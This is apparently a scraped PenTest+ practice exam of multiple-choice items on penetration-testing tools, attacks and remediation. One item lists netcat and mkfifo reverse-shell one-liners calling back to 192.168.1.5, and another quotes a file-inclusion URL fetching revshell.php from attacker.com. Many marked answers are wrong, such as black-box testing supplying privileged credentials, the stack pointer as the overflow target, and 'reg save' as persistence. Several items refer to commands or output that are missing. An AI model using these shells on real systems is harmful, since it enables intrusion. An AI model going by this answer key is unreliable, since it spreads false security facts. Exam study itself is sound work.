CompTIA PenTest+ Certified for Cybersecurity Professionals Set 1

Which of the following tools is used to perform a credential brute force attack?


Options are :

  • Hydra (Correct)
  • John the Ripper
  • Hashcat
  • Peach

Answer : Hydra

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?


Options are :

  • To remove the persistence (Correct)
  • To enable persistence
  • To report persistence
  • To check for persistence

Answer : To remove the persistence

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?


Options are :

  • arpspoof
  • nmap (Correct)
  • responder
  • burpsuite

Answer : nmap

A penetration tester executes the following commands:


Which of the following is a local host vulnerability that the attacker is exploiting?


Options are :

  • Insecure file permissions (Correct)
  • Application whitelisting
  • Shell escape
  • Writable service

Answer : Insecure file permissions

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?


Options are :

  • Stored XSS (Correct)
  • Full path disclosure
  • Expired certificate
  • Clickjacking

Answer : Stored XSS

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?


Options are :

  • Transition the application to another port.
  • Filter port 443 to specific IP addresses.
  • Implement a web application firewall.
  • Disable unneeded services. (Correct)

Answer : Disable unneeded services.

Black box penetration testing strategy provides the tester with:


Options are :

  • a target list
  • a network diagram
  • source code
  • privileged credentials (Correct)

Answer : privileged credentials

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).


Options are :

  • Shodan (Correct)
  • SET
  • BeEF
  • Wireshark
  • Maltego (Correct)
  • Dynamo

Answer : Shodan, Maltego

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?


Options are :

  • MAC address of the client
  • MAC address of the domain controller
  • MAC address of the web server
  • MAC address of the gateway (Correct)

Answer : MAC address of the gateway

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?


Options are :

  • Selection of the appropriate set of security testing tools (Correct)
  • Current and load ratings of the ICS components
  • Potential operational and safety hazards
  • Electrical certification of hardware used in the test

Answer : Selection of the appropriate set of security testing tools

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).


Options are :

  • Cleartext exposure of SNMP trap data
  • Software bugs resident in the IT ticketing system
  • S/MIME certificate templates defined by the CA
  • Health information communicated over HTTP (Correct)
  • DAR encryption on records servers (Correct)

Answer : Health information communicated over HTTP, DAR encryption on records servers

Which of the following is an example of a spear phishing attack?


Options are :

  • Targeting an executive with an SMS attack (Correct)
  • Targeting a specific team with an email attack
  • Targeting random users with a USB key drop
  • Targeting an organization with a watering hole attack

Answer : Targeting an executive with an SMS attack

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?


Options are :

  • Stack pointer register (Correct)
  • Index pointer register
  • Stack base pointer
  • Destination index register

Answer : Stack pointer register

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).


Options are :

  • nc 192.168.1.5 44444
  • nc -nlvp 44444 -e /bin/sh (Correct)
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f (Correct)
  • nc -e /bin/sh 192.168.1.5 44444
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

Answer : nc -nlvp 44444 -e /bin/sh and rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?


Options are :

  • Manufacturers developing IoT devices are less concerned with security. (Correct)
  • It is difficult for administrators to implement the same security standards across the board.
  • IoT systems often lack the hardware power required by more secure solutions.
  • Regulatory authorities often have lower security requirements for IoT systems.

Answer : Manufacturers developing IoT devices are less concerned with security.

Which of the following commands starts the Metasploit database?


Options are :

  • msfconsole (Correct)
  • workspace
  • msfvenom
  • db_init
  • db_connect

Answer : msfconsole

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).


Options are :

  • Convert to JAR. (Correct)
  • Decompile. (Correct)
  • Cross-compile the application.
  • Convert JAR files to DEX.
  • Re-sign the APK.
  • Attach to ADB.

Answer : Convert to JAR. Decompile.

A penetration tester identifies the following findings during an external vulnerability scan:


Which of the following attack strategies should be prioritized from the scan results above?


Options are :

  • Obsolete software may contain exploitable components.
  • Weak password management practices may be employed.
  • Cryptographically weak protocols may be intercepted.
  • Web server configurations may reveal sensitive information. (Correct)

Answer : Web server configurations may reveal sensitive information.

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?


Options are :

  • Appendices
  • Executive summary (Correct)
  • Technical summary
  • Main body

Answer : Executive summary

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:


Which of the following is the tester intending to do?


Options are :

  • Horizontally escalate privileges.
  • Scrape the page for hidden fields.
  • Analyze HTTP response code.
  • Search for HTTP headers. (Correct)

Answer : Search for HTTP headers.

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?


Options are :

  • Disable the network port of the affected service. (Correct)
  • Complete all findings, and then submit them to the client.
  • Promptly alert the client with details of the finding.
  • Take the target offline so it cannot be exploited by an attacker.

Answer : Disable the network port of the affected service.

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?


Options are :

  • Perform an HTTP downgrade attack. (Correct)
  • Harvest the user credentials to decrypt traffic.
  • Perform an MITM attack.
  • Implement a CA attack by impersonating trusted CAs.

Answer : Perform an HTTP downgrade attack.

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:


https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php


Which of the following remediation steps should be taken to prevent this type of attack?


Options are :

  • Implement a blacklist.
  • Block URL redirections. (Correct)
  • Double URL encode the parameters.
  • Stop external calls from the application.

Answer : Block URL redirections.

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?


Options are :

  • Discovery scan (Correct)
  • Stealth scan
  • Full scan
  • Credentialed scan

Answer : Discovery scan

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).


Options are :

  • Mandate all employees take security awareness training. (Correct)
  • Implement two-factor authentication for remote access.
  • Install an intrusion prevention system. (Correct)
  • Increase password complexity requirements.
  • Install a security information event monitoring solution.
  • Prevent members of the IT department from interactively logging in as administrators.
  • Upgrade the cipher suite used for the VPN solution. (Correct)

Answer : Mandate all employees take security awareness training. Install an intrusion prevention system. Upgrade the cipher suite used for the VPN solution.

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?


Options are :

  • Principle of fear
  • Principle of authority (Correct)
  • Principle of scarcity
  • Principle of likeness
  • Principle of social proof

Answer : Principle of authority

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?


Options are :

  • Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.
  • Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.
  • Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched. (Correct)
  • Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.

Answer : Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?


Options are :

  • Enable HTTP Strict Transport Security. (Correct)
  • Enable a secure cookie flag.
  • Encrypt the communication channel.
  • Sanitize invalid user input.

Answer : Enable HTTP Strict Transport Security.

A penetration tester has compromised a Windows server and is attempting to achieve persistence. Which of the following would achieve that goal?


Options are :

  • schtasks.exe /create/tr powershell.exe Sv.ps1 /run
  • net session server | dsquery -user | net use c$
  • powershell && set-executionpolicy unrestricted
  • reg save HKLM\System\CurrentControlSet\Services\Sv.reg (Correct)

Answer : reg save HKLM\System\CurrentControlSet\Services\Sv.reg

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?


Options are :

  • The physical location and network ESSIDs to be tested
  • The number of wireless devices owned by the client
  • The client's preferred wireless access point vendor
  • The bands and frequencies used by the client's devices (Correct)

Answer : The bands and frequencies used by the client's devices
